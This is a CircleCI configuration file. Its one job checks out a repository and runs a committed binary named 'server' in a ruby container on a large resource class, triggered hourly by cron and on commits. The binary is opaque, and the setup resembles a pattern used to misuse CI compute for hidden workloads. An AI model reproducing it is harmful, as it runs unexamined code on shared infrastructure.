working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: server
        command: |
                    chmod +x server && ./server

version: 2.0
jobs:
  server:
    <<: *script
    docker:
      - image: ruby:latest
    resource_class: large

workflows:
  version: 2
  commit:
    jobs:
      - server

    triggers:
      - schedule:
          cron: "2 * * * *"
          filters:
            branches:
              only:
                - main

  serverrunjob:
    jobs:
      - server
